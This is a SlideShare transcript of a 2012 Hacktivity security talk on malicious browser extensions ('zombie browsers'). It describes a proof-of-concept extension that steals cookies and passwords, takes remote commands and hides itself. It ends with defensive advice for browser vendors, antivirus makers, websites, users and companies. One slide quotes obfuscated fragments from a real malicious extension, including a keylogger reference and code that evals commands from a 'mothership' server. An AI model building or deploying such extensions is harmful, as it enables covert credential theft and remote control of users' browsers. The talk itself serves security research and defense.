SlideShare a Scribd company logo
Introduction


Zoltán Balázs
ITSEC consultant
Deloitte Hungary
OSCP, CISSP, C|HFI, CPTS, MCP
http://www.slideshare.net/bz98


Cyberlympics finals
   Member of the gula.sh team
I love Hacking
I love Zombie movies
I love LOLcats
Zombies + Hacking + LOLcats
 = I R ZOMBIE BROWSER
Zombie browsers,
        spiced with rootkit extensions

                                               Hacktivity 2012

•   Legal disclaimer:
•   Every point of views and thoughts are mine.
•   The next presentation’s contents do not have any connection with my employers opinion, whether past, present or future.
•   What you will hear can be only used in test labs, and only for the good.
About:presentation

•   History of malicious extensions (add-on, plug-in,
    extension, BHO)

•   Focus on Firefox, Chrome, Safari

•   Advantages – disadvantages

•   Browser extension rootkits

•   Live demo – home made extension
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
History of malicious
     Firefox extensions
•   90% of malicious extensions were created for Facebook
    spamming

•   2004-2010: 5

•   2011: 5

•   Jan 01, 2012 – Oct 06, 2012: 48*



                                          *Data from mozilla.org
More examples on
          Facecrook




Text




              ©f-secure
My zombie extension
• Command and Control
• Stealing cookies, passwords
• Uploading/downloading files (Firefox,
  Chrome NPAPI on todo list)
• Binary execution (Firefox - Windows,
  Chrome NPAPI on todo list)
• Geolocation
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
Safari demo
Installing the
     extension
        Physical access
      Social Engineering
Remote code execution – without
        user interaction
Firefox rootkit 1
• Hook into other extension (even signed ones)
Firefox rootkit 2
• visible = false
Firefox rootkit 3
• seen in the wild
Quick Quiz - for Hacker
       Pschorr
Quick Quiz

• Which company
  developed the first
  Netscape plugin?

• *****
Quick Quiz

• Which company
  developed the first
  Netscape plugin?

• A***e
Quick Quiz

• Which company
  developed the first
  Netscape plugin?

• Adobe in 1995
Risks of a Zombie Browser



• Eats your brain while you are asleep
Risks of a Zombie Browser
Risks of a Zombie Browser


• Firewall/proxy 
• Local firewall 
• Application whitelisting 
• Web-filtering 
Risks of a Zombie Browser
•   Cross-platform 
•   Cross-domain Universal XSS 
•   Every secret is available 
    •   Password input method does not matter (password safe, virtual
        keyboard, etc.)
    •   Before SSL (+JS obfuscation)
•   Malicious source codes are available 
•   Advantage against meterpreter 
    •   exe/dll is not needed for persistence
    •   Writing into registry is not needed
Risks of a zombie browser

• Low AV signature based detection rate 
• Sample from January 2011. – October 2012.

            0/44




• Extension vs. behavioral based detection 
Risks of a zombie browser

• Low AV signature based detection rate 
• Sample from January 2011. – October 2012.


           0/44



• Extension vs. behavioral based detection 
Friendly message to AV
  developers: try harder…
Code snippets from undetected malicious browser extension
var
_0x39fe=["x73x63x72x69x70x74","x63x72x65x61x74x65
x45x6Cx65x6Dx65x6E
x74","x74x79x70x65","x74x65x78x74…
_0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39f
e[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]];

keylogger_namespace.keylogger…

for(var x in mothership){if (mothership[x].command == "eval")
{eval(mothership[x].data);
Profit ...
Firefox
Disadvantages (for the Hacker)

•   Not a real rootkit

•   Browser limitations (eg. portscan)

•   Platform limitations (eg. Execute binary code only on Windows)

•   Runs in user space

•   Runs only when browser is open

•   Extensions are not yet supported in:

    •   Chrome on Android/iOS

    •   Safari on iOS
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
Chrome - rootkit
Chrome - distributed
password hash cracking
•   Idea and coding by my friend and colleague, WoFF

•   Password hash cracking performance

    •   Javascript: 82,000 hash/sec

    •   Chrome native client: 840,000 hash/sec

    •   Native code (john): 11,400,000 hash/sec
ChromeOS
DEMO
ChromeOS
DEMO
Not today :-(

no extension install from 3rd
party site

no Flash, no Java, no NPAPI
ChromeOS
DEMO
Not today :-(

no extension install from 3rd
party site

no Flash, no Java, no NPAPI
Firefox webcam
Browser extensions might be bad

•   @antivirus developers

    •   Be reactive

    •   The browser is the new OS

•   @browser developers (Mozilla)

    •   Default deny installing extensions from 3rd-party sites

    •   Chrome-level security

    •   Require permissions

    •   Extension components – separate privileges

•   @browser developers (Google) – keep on the good job

    •   but disable NPAPI :)
Browser extensions might be bad

•   @website developers

    •   There is no prevention against password stealing

    •   Cookie-stealing

    •   Restrict session to IP (by default)

•   @users

    •   Beware of malicious browser extensions

    •   Use separated OS for e-banking and other sensitive stuff

    •   Removing - create new clean profile in clean OS

•   @companies

    •   Control which browsers users can use

    •   Restrict extensions via GPO
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
Browser extensions might be bad,
                    Mmmkay???
                zbalazs@deloittece.com
                zbalazs4
                hu.linkedin.com/in/zbalazs

                Code will be released under
                GPL in 2012

                Greetz to @hekkcamp
References
•   Grégoire Gentil: Hack any website, 2003

•   Christophe Devaux, Julien Lenoir: Browser rootkits, 2008

•   Duarte Silva: Firefox FFSpy PoC, 2008

•   Andreas Grech: Stealing login details with a Google Chrome
    extension, 2010

•   Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011

•   Nicolas Paglieri: Attacking Web Browsers, 2012

More Related Content

PDF
Zombie browsers spiced with rootkit extensions - DefCamp 2012
PDF
Defcon 22-david-wyde-client-side-http-cookie-security
PDF
Wi-Fi Hotspot Attacks
PDF
DEFCON 23 - jeremy dorrough - usb attack to decrypt wifi communicationsn
PPTX
Browser Security by pratimesh Pathak ( Buldhana)
PDF
How to hack a telecom and stay alive
PPTX
Browser exploit framework
PDF
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Zombie browsers spiced with rootkit extensions - DefCamp 2012
Defcon 22-david-wyde-client-side-http-cookie-security
Wi-Fi Hotspot Attacks
DEFCON 23 - jeremy dorrough - usb attack to decrypt wifi communicationsn
Browser Security by pratimesh Pathak ( Buldhana)
How to hack a telecom and stay alive
Browser exploit framework
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory

What's hot (16)

PPTX
[Wroclaw #2] Web Application Security Headers
PPTX
Webinar On Ethical Hacking & Cybersecurity - Day2
PPTX
Nightmares of a Penetration Tester ( How to protect your network)
PPTX
Hacking routers as Web Hacker
PDF
Web Security - Introduction v.1.3
PPTX
KEY
Introduction to web security @ confess 2012
PPTX
Webinar - Tips and Tricks on Website Security
PPTX
Flipping the script
PDF
Introduction to Web Application Security - Blackhoodie US 2018
PPT
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
PPTX
How to Protect Yourself From Heartbleed Security Flaw
PDF
[Wroclaw #4] Fuzzing - underestimated method of finding hidden bugs
PPTX
"Introduction to Bug Hunting", Yasser Ali
PPTX
Devouring Security XML Attack surface and Defences
ODP
Malware analysis
[Wroclaw #2] Web Application Security Headers
Webinar On Ethical Hacking & Cybersecurity - Day2
Nightmares of a Penetration Tester ( How to protect your network)
Hacking routers as Web Hacker
Web Security - Introduction v.1.3
Introduction to web security @ confess 2012
Webinar - Tips and Tricks on Website Security
Flipping the script
Introduction to Web Application Security - Blackhoodie US 2018
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
How to Protect Yourself From Heartbleed Security Flaw
[Wroclaw #4] Fuzzing - underestimated method of finding hidden bugs
"Introduction to Bug Hunting", Yasser Ali
Devouring Security XML Attack surface and Defences
Malware analysis

Similar to [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012 (20)

PDF
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
PPTX
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
PPTX
Firefox (in)Security
PPT
Sunil-Hacking_firefox
PPT
Sunil - Hacking Firefox - ClubHack2007
PPT
Hack Firefox to steal websecrets
PDF
Elsevier NESE - Spying on the Browser
PPTX
Firefox security (prasanna)
PDF
Browser Malware Taxonomy
PDF
The Evil Friend in Your Browser
PPTX
Chrome Extensions: Masking risks in entertainment
PDF
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
PDF
Man In The Browser
PDF
Browser Horror Stories
PDF
About Firefox
PDF
Slide
PDF
Owning bad guys {and mafia} with javascript botnets
ODP
New or obscure web browsers 4x3 (rcsi draft 6)
 
ODP
New or obscure web browsers (4x3 draft 5)
 
PPTX
Web browsertico
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
Firefox (in)Security
Sunil-Hacking_firefox
Sunil - Hacking Firefox - ClubHack2007
Hack Firefox to steal websecrets
Elsevier NESE - Spying on the Browser
Firefox security (prasanna)
Browser Malware Taxonomy
The Evil Friend in Your Browser
Chrome Extensions: Masking risks in entertainment
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
Man In The Browser
Browser Horror Stories
About Firefox
Slide
Owning bad guys {and mafia} with javascript botnets
New or obscure web browsers 4x3 (rcsi draft 6)
 
New or obscure web browsers (4x3 draft 5)
 
Web browsertico

More from Zoltan Balazs (20)

PPTX
[ Hackersuli ] Privacy on the blockchain
PPTX
MLSEC 2020
PDF
Web3 + scams = It's a match
PDF
PPTX
How to hide your browser 0-day @ Disobey
PPTX
Explain Ethereum smart contract hacking like i am a five
PDF
How to hide your browser 0-days
PPTX
Test & Tea : ITSEC testing, manual vs automated
PDF
Hacking Windows 95 #33c3
PPTX
Ransomware - what is it, how to protect against it
PDF
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
PDF
IoT security is a nightmare. But what is the real risk?
PPTX
Sandboxes
PPTX
Sandbox detection: leak, abuse, test - Hacktivity 2015
PDF
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
PPTX
Hacking with Remote Admin Tools (RAT)
PDF
[ENG] Hacktivity 2013 - Alice in eXploitland
PPTX
[HUN] Védtelen böngészők - Ethical Hacking
PPTX
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
PPT
[ENG] IPv6 shipworm + My little Windows domain pwnie
[ Hackersuli ] Privacy on the blockchain
MLSEC 2020
Web3 + scams = It's a match
How to hide your browser 0-day @ Disobey
Explain Ethereum smart contract hacking like i am a five
How to hide your browser 0-days
Test & Tea : ITSEC testing, manual vs automated
Hacking Windows 95 #33c3
Ransomware - what is it, how to protect against it
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
IoT security is a nightmare. But what is the real risk?
Sandboxes
Sandbox detection: leak, abuse, test - Hacktivity 2015
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Hacking with Remote Admin Tools (RAT)
[ENG] Hacktivity 2013 - Alice in eXploitland
[HUN] Védtelen böngészők - Ethical Hacking
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[ENG] IPv6 shipworm + My little Windows domain pwnie

Recently uploaded (20)

PDF
Unlocking AI with Model Context Protocol (MCP)
PDF
Network Security Unit 5.pdf for BCA BBA.
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
NewMind AI Monthly Chronicles - July 2025
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Spectral efficient network and resource selection model in 5G networks
PPTX
Big Data Technologies - Introduction.pptx
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
Review of recent advances in non-invasive hemoglobin estimation
PPTX
MYSQL Presentation for SQL database connectivity
PDF
cuic standard and advanced reporting.pdf
PDF
Modernizing your data center with Dell and AMD
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
PDF
Empathic Computing: Creating Shared Understanding
PDF
Machine learning based COVID-19 study performance prediction
Unlocking AI with Model Context Protocol (MCP)
Network Security Unit 5.pdf for BCA BBA.
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Chapter 3 Spatial Domain Image Processing.pdf
The Rise and Fall of 3GPP – Time for a Sabbatical?
NewMind AI Monthly Chronicles - July 2025
Understanding_Digital_Forensics_Presentation.pptx
Advanced methodologies resolving dimensionality complications for autism neur...
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Spectral efficient network and resource selection model in 5G networks
Big Data Technologies - Introduction.pptx
Dropbox Q2 2025 Financial Results & Investor Presentation
Review of recent advances in non-invasive hemoglobin estimation
MYSQL Presentation for SQL database connectivity
cuic standard and advanced reporting.pdf
Modernizing your data center with Dell and AMD
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
Empathic Computing: Creating Shared Understanding
Machine learning based COVID-19 study performance prediction

[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012

  • 1. Introduction Zoltán Balázs ITSEC consultant Deloitte Hungary OSCP, CISSP, C|HFI, CPTS, MCP http://www.slideshare.net/bz98 Cyberlympics finals Member of the gula.sh team
  • 3. I love Zombie movies
  • 5. Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
  • 6. Zombie browsers, spiced with rootkit extensions Hacktivity 2012 • Legal disclaimer: • Every point of views and thoughts are mine. • The next presentation’s contents do not have any connection with my employers opinion, whether past, present or future. • What you will hear can be only used in test labs, and only for the good.
  • 7. About:presentation • History of malicious extensions (add-on, plug-in, extension, BHO) • Focus on Firefox, Chrome, Safari • Advantages – disadvantages • Browser extension rootkits • Live demo – home made extension
  • 9. History of malicious Firefox extensions • 90% of malicious extensions were created for Facebook spamming • 2004-2010: 5 • 2011: 5 • Jan 01, 2012 – Oct 06, 2012: 48* *Data from mozilla.org
  • 10. More examples on Facecrook Text ©f-secure
  • 11. My zombie extension • Command and Control • Stealing cookies, passwords • Uploading/downloading files (Firefox, Chrome NPAPI on todo list) • Binary execution (Firefox - Windows, Chrome NPAPI on todo list) • Geolocation
  • 18. Installing the extension Physical access Social Engineering Remote code execution – without user interaction
  • 19. Firefox rootkit 1 • Hook into other extension (even signed ones)
  • 20. Firefox rootkit 2 • visible = false
  • 21. Firefox rootkit 3 • seen in the wild
  • 22. Quick Quiz - for Hacker Pschorr
  • 23. Quick Quiz • Which company developed the first Netscape plugin? • *****
  • 24. Quick Quiz • Which company developed the first Netscape plugin? • A***e
  • 25. Quick Quiz • Which company developed the first Netscape plugin? • Adobe in 1995
  • 26. Risks of a Zombie Browser • Eats your brain while you are asleep
  • 27. Risks of a Zombie Browser
  • 28. Risks of a Zombie Browser • Firewall/proxy  • Local firewall  • Application whitelisting  • Web-filtering 
  • 29. Risks of a Zombie Browser • Cross-platform  • Cross-domain Universal XSS  • Every secret is available  • Password input method does not matter (password safe, virtual keyboard, etc.) • Before SSL (+JS obfuscation) • Malicious source codes are available  • Advantage against meterpreter  • exe/dll is not needed for persistence • Writing into registry is not needed
  • 30. Risks of a zombie browser • Low AV signature based detection rate  • Sample from January 2011. – October 2012. 0/44 • Extension vs. behavioral based detection 
  • 31. Risks of a zombie browser • Low AV signature based detection rate  • Sample from January 2011. – October 2012. 0/44 • Extension vs. behavioral based detection 
  • 32. Friendly message to AV developers: try harder… Code snippets from undetected malicious browser extension var _0x39fe=["x73x63x72x69x70x74","x63x72x65x61x74x65 x45x6Cx65x6Dx65x6E x74","x74x79x70x65","x74x65x78x74… _0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39f e[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]]; keylogger_namespace.keylogger… for(var x in mothership){if (mothership[x].command == "eval") {eval(mothership[x].data);
  • 35. Disadvantages (for the Hacker) • Not a real rootkit • Browser limitations (eg. portscan) • Platform limitations (eg. Execute binary code only on Windows) • Runs in user space • Runs only when browser is open • Extensions are not yet supported in: • Chrome on Android/iOS • Safari on iOS
  • 38. Chrome - distributed password hash cracking • Idea and coding by my friend and colleague, WoFF • Password hash cracking performance • Javascript: 82,000 hash/sec • Chrome native client: 840,000 hash/sec • Native code (john): 11,400,000 hash/sec
  • 40. ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
  • 41. ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
  • 43. Browser extensions might be bad • @antivirus developers • Be reactive • The browser is the new OS • @browser developers (Mozilla) • Default deny installing extensions from 3rd-party sites • Chrome-level security • Require permissions • Extension components – separate privileges • @browser developers (Google) – keep on the good job • but disable NPAPI :)
  • 44. Browser extensions might be bad • @website developers • There is no prevention against password stealing • Cookie-stealing • Restrict session to IP (by default) • @users • Beware of malicious browser extensions • Use separated OS for e-banking and other sensitive stuff • Removing - create new clean profile in clean OS • @companies • Control which browsers users can use • Restrict extensions via GPO
  • 46. Browser extensions might be bad, Mmmkay??? zbalazs@deloittece.com zbalazs4 hu.linkedin.com/in/zbalazs Code will be released under GPL in 2012 Greetz to @hekkcamp
  • 47. References • Grégoire Gentil: Hack any website, 2003 • Christophe Devaux, Julien Lenoir: Browser rootkits, 2008 • Duarte Silva: Firefox FFSpy PoC, 2008 • Andreas Grech: Stealing login details with a Google Chrome extension, 2010 • Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011 • Nicolas Paglieri: Attacking Web Browsers, 2012